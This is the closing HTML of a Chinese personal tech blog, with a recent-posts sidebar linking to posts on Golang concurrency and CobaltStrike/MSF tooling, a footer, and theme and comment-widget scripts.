class="toc-number">18.</span> <span class="toc-text">参考资料</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2021/09/4e16c1bd.html" title="从实战理解 Golang 的多并发能力"><img data-lazy-src="https://img.lintstar.top/hexo/20210929213800.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="从实战理解 Golang 的多并发能力"/></a><div class="content"><a class="title" href="/2021/09/4e16c1bd.html" title="从实战理解 Golang 的多并发能力">从实战理解 Golang 的多并发能力</a><time datetime="2021-09-29T03:49:59.000Z" title="发表于 2021-09-29 11:49:59">2021-09-29</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/08/4b8ee7df.html" title="关于 Github 不再支持命令行通过密码操作仓库的解决办法"><img data-lazy-src="https://img.lintstar.top/hexo/20210816110414.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="关于 Github 不再支持命令行通过密码操作仓库的解决办法"/></a><div class="content"><a class="title" href="/2021/08/4b8ee7df.html" title="关于 Github 不再支持命令行通过密码操作仓库的解决办法">关于 Github 不再支持命令行通过密码操作仓库的解决办法</a><time datetime="2021-08-28T03:49:59.000Z" title="发表于 2021-08-28 11:49:59">2021-08-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/07/e65fcded.html" title="CS-ServerChan 主机上线微信通知"><img data-lazy-src="https://img.lintstar.top/hexo/20210728115114.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="CS-ServerChan 主机上线微信通知"/></a><div class="content"><a class="title" href="/2021/07/e65fcded.html" title="CS-ServerChan 主机上线微信通知">CS-ServerChan 主机上线微信通知</a><time datetime="2021-07-28T03:49:59.000Z" title="发表于 2021-07-28 11:49:59">2021-07-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/07/d1676e54.html" title="LSTAR - CobaltStrike 后渗透插件"><img data-lazy-src="https://img.lintstar.top/hexo/20210707153910.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="LSTAR - CobaltStrike 后渗透插件"/></a><div class="content"><a class="title" href="/2021/07/d1676e54.html" title="LSTAR - CobaltStrike 后渗透插件">LSTAR - CobaltStrike 后渗透插件</a><time datetime="2021-07-07T05:49:59.000Z" title="发表于 2021-07-07 13:49:59">2021-07-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/06/cc6d559a.html" title="MSF 作战手册及联动 CobaltStrike"><img data-lazy-src="https://img.lintstar.top/hexo/20210705103406.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="MSF 作战手册及联动 CobaltStrike"/></a><div class="content"><a class="title" href="/2021/06/cc6d559a.html" title="MSF 作战手册及联动 CobaltStrike">MSF 作战手册及联动 CobaltStrike</a><time datetime="2021-06-12T15:49:59.000Z" title="发表于 2021-06-12 23:49:59">2021-06-12</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url(https://img.lintstar.top/hexo/20201204184628.webp)"><div id="footer-wrap"><div class="copyright">&copy;2018 - 2023 <i style="color:#FF6A6A" class="fa fa-heartbeat"></i> 离沫凌天๓</div><div class="footer_custom_text">生如逐放 心有焰藏</div><div class="icp"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/"><img class="icp-icon" src="/plogo/icp.png"/><span>津ICP备18005284号</span></a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><script>function panguFn () {
  if (typeof pangu === 'object') pangu.spacingElementById('content-inner')
  else {
    getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js')
      .then(() => {
        pangu.spacingElementById('content-inner')
      })
  }
}

function panguInit () {
  if (false){
    GLOBAL_CONFIG_SITE.isPost && panguFn()
  } else {
    panguFn()
  }
}

document.addEventListener('DOMContentLoaded', panguInit)</script><script src="/js/search/local-search.js"></script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    let initData = {
      el: '#vcomment',
      appId: 'IO9a37akXEBhcRHfWBtCYpP4-gzGzoHsz',
      appKey: 'yIfjz0E13epDN98BRX5uxeM7',
      placeholder: '请畅所欲言吧！昵称那里填写你的QQ号就可以自动获取邮箱、头像、昵称啦',
      avatar: 'monsterid',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'zh-CN',
      recordIP: true,
      serverURLs: 'https:com.lintstar.top',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: true,
      path: window.location.pathname,
    }

    if (true) { 
      initData.requiredFields= ('nick,mail'.split(','))
    }
    
    if (false) {
      const otherData = false
      initData = Object.assign(initData, otherData)
    }
    
    const valine = new Valine(initData)
  }

  if (typeof Valine === 'function') initValine() 
  else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}

if ('Valine' === 'Valine' || !true) {
  if (true) btf.loadComment(document.getElementById('vcomment'),loadValine)
  else setTimeout(loadValine, 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="false"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = false;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="true"></script></div></body></html>